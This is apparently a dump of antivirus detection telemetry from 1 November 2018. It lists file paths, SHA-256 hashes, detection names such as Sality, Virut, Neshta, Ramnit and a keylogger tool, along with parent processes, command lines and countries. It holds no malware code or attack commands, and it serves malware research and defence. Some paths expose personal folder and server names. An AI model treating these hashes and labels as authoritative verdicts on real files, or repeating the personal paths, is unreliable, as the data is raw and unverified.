  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='--engine=2 --session-id=XIH\\\\\\/Go3BhU\\\\\\/csOp+6EmSL8+WIkDrmcGGyvZBQGEU --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.174.200\\software_reporter_tool.exe', parentsize=12184696, timestamp='2018-11-01T17:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T14:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='systm.exe', filepath='C:\\Users\\X\\Desktop\\OrganiZen\\Tümü bir arada 29-09-2017\\csduragi_cs16\\new2\\systm.exe', filesize=1472000, name='W32/Ramnit.C.#M1.#R1'), hash='9b861b0a70f3ed516a9b36b828f80c4a0aa63204cf38ec00c73bb5b4d9a9611b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HbRxC8X4hEyKh6V3.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dfjukopy.exe', filepath='\\?\\J:\\العاب\\GTA12\\dfjukopy.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9b984dc2283424ea7609dc5cb6ed5b3e245f725c952c54e3b41255a0a4c9e8b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T15:16:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:39:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T04:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T18:42:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:42:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\Windows Msn\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9cb6f4745305a405a07e156f92d6acd31d596bdc8fbe6e60eabc86cc54206510', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:21:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\CPD\\DOWNLOADS\\Office 2007\\OFFICE.PT-BR\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:06:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\dw\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KEpfKUcCvUGz6A9p.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:25:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mobile Partner\\UpdateDog\\ouc.exe', parentsize=697184, timestamp='2018-11-01T17:14:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\MSOCache\\All Users\\{90120000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mobile Partner\\UpdateDog\\ouc.exe', parentsize=697184, timestamp='2018-11-01T16:57:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='frogadv.exe', filepath='\\?\\J:\\العاب2\\الضفدعة الجديدة\\FrogADV.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9d0e970001b56f8f5ced0be3ea381550d84ec194a2dd12dcfcaa424271622a09', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccminer.exe', filepath='\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1312461072-2941733865-2679675949-1001\\$RW50CGO\\ccminer-djm34-mod-r1\\ccminer.exe', filesize=61632000, name='HEUR/AGEN.1031883.#M1.#R1'), hash='9d283ec8daef71b6046fdaa78a46501be335d3612b6583f5b8d454529be780c2', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:56:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D41CC0D5F8B97B9ABDFD6CA61B10F159868BFAB17F7E1D94FB1A10ACD69E052', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\windows\\syswow64\\config\\manual\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\tib\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T23:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\windows\\syswow64\\config\\manual\\1\\2\\3\\1\\1\\1\\1\\1\\1\\2\\3\\1\\1\\1\\tib\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='9d4f0082ca27b8ec25f8b7ba843e8ee360efab2c8fcdf00066e6700bdfcbc75e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T11:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201859-3c69c357', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae893140\\AVSCAN-20181101-200910-F22492D2\\AVSCAN-20181101-201859-3C69C357', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201546-2416a5a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae893140\\AVSCAN-20181101-200910-F22492D2\\AVSCAN-20181101-201546-2416A5A0', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='9d6d3b95598efbfde9027931f8c12f8aedfdf33a0e75cdca7b900b4e77dead91', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d9032232a879ff61de13167d860627620ddc88a81d897d9bf4cf7502ec5115f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9D9032232A879FF61DE13167D860627620DDC88A81D897D9BF4CF7502EC5115F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d9032232a879ff61de13167d860627620ddc88a81d897d9bf4cf7502ec5115f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mamep64.exe', filepath='G:\\임시\\MAMEPlus_r5275_0168_2_x64_NoNag\\mamep64.exe', filesize=142528000, name='HEUR/AGEN.1018733.#M1.#R1'), hash='9e2793e3fde0523bc9549adb0e1898693a6b9dfa43ca91d923b948b47b17cab3', metadata=Row(cmdline='\\\\\\"G:\\\\\\\\백종원의+골목식당.E38.181031.1080p-NEXT.mp4.torrent\\\\\\"', country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\uttorrent_2.0.4_portable\\utorrent.exe', parentsize=328568, timestamp='2018-11-01T08:41:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\SERVER-GOLD\\HOMEZ\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T14:07:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\Server-gold\\home\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T03:10:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printwiz.exe', filepath='\\\\SERVER-GOLD\\HOME\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Programs\\PrintWiz.exe', filesize=304000, name='W32/Sality.AT.#M1.#R1'), hash='9e2bf003f1bb05af1fab4360d069f7c6e5d03387236898b5bcc2a4763bd099db', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9e7f2db891b8037ec67d537f89f81b79df205f83f0705d16cc8753d791013cd6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9e7f2db891b8037ec67d537f89f81b79df205f83f0705d16cc8753d791013cd6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-01T01:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='05-th-charm-of-au.exe', filepath='E:\\font thai\\05-TH-Charm-of-AU\\05-TH-Charm-of-AU.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='9ea3246caf376fc337c7a1e37b21c88bb60dd5fe7c1c8a177e001bf257b2277d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9eb23b92886e930fd8ca12cb0322308f9d22afc200ef6c9d19fd09ca2ffa865a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\9EB23B92886E930FD8CA12CB0322308F9D22AFC200EF6C9D19FD09CA2FFA865A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='9eb23b92886e930fd8ca12cb0322308f9d22afc200ef6c9d19fd09ca2ffa865a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:25:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP HD PROBLEMA\\Desktop\\Lixo\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\Caio\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ps2pdf995.exe', filepath='D:\\BKP\\Desktop\\Lixo\\ps2pdf995.exe', filesize=8388000, name='W32/Neshta.A.#M1.#R1'), hash='9f0b2c81ae468ee620aea67b2d9be6f083ac61f939b01554bca3372a11acb3b1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:01:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9f473f920a07ea0f4fd8ce689c8099deea64c073f47eed600454f636a8b1a740', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9F473F920A07EA0F4FD8CE689C8099DEEA64C073F47EED600454F636A8B1A740', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f473f920a07ea0f4fd8ce689c8099deea64c073f47eed600454f636a8b1a740', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files (x86)\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='9f64f3b7f684d5557efbc40aa949b0dbf9dbccc36b662e5cc5b2fdc00058f20f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-01T17:31:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-145835-fec10135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b647c110\\AVSCAN-20181102-133332-24AE2147\\AVSCAN-20181102-145835-FEC10135', filesize=576000, name='TR/ATRAPS.vkmip.#M1.#R1'), hash='9f7957a6c81655d1a33cdcc4fa9aa0ff11953712d672577c777860a0be31eb0f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-152855-a7d9f86b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b647c110\\AVSCAN-20181102-133332-24AE2147\\AVSCAN-20181102-152855-A7D9F86B', filesize=576000, name='TR/ATRAPS.vkmip.#M1.#R1'), hash='9f7957a6c81655d1a33cdcc4fa9aa0ff11953712d672577c777860a0be31eb0f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admin.exe', filepath='E:\\PENTA 14-09-2016\\admin.exe', filesize=6720000, name='W32/Almanahe.D.#M1.#R1'), hash='9f9c4216b3ab8471f0ffbdcd2556b8730d613cb1675bfa3271a287600294555f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='barb .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\barb\\barb .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9fb8f194592f7d66418e8c042eb261f3bee238b62e82aa1110c01402fb309a85', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cccleaner.exe', filepath='\\\\?\\C:\\Program Files\\Siemens\\Automation\\SCADA-RT_V11\\WinCC\\bin\\CCCleaner.exe', filesize=136000, name='W32/Sality.AG.#M1.#R1'), hash='9fc034cc56460461b8033553d27f057ee8e80bb62a912d02ec5e86dbae25d940', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cccleaner.exe', filepath='C:\\Program Files\\Siemens\\Automation\\SCADA-RT_V11\\WinCC\\bin\\CCCleaner.exe', filesize=136000, name='W32/Sality.AG.#M1.#R1'), hash='9fc034cc56460461b8033553d27f057ee8e80bb62a912d02ec5e86dbae25d940', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:39:17Z'), dt=datetime.date(2018, 11, 1)),
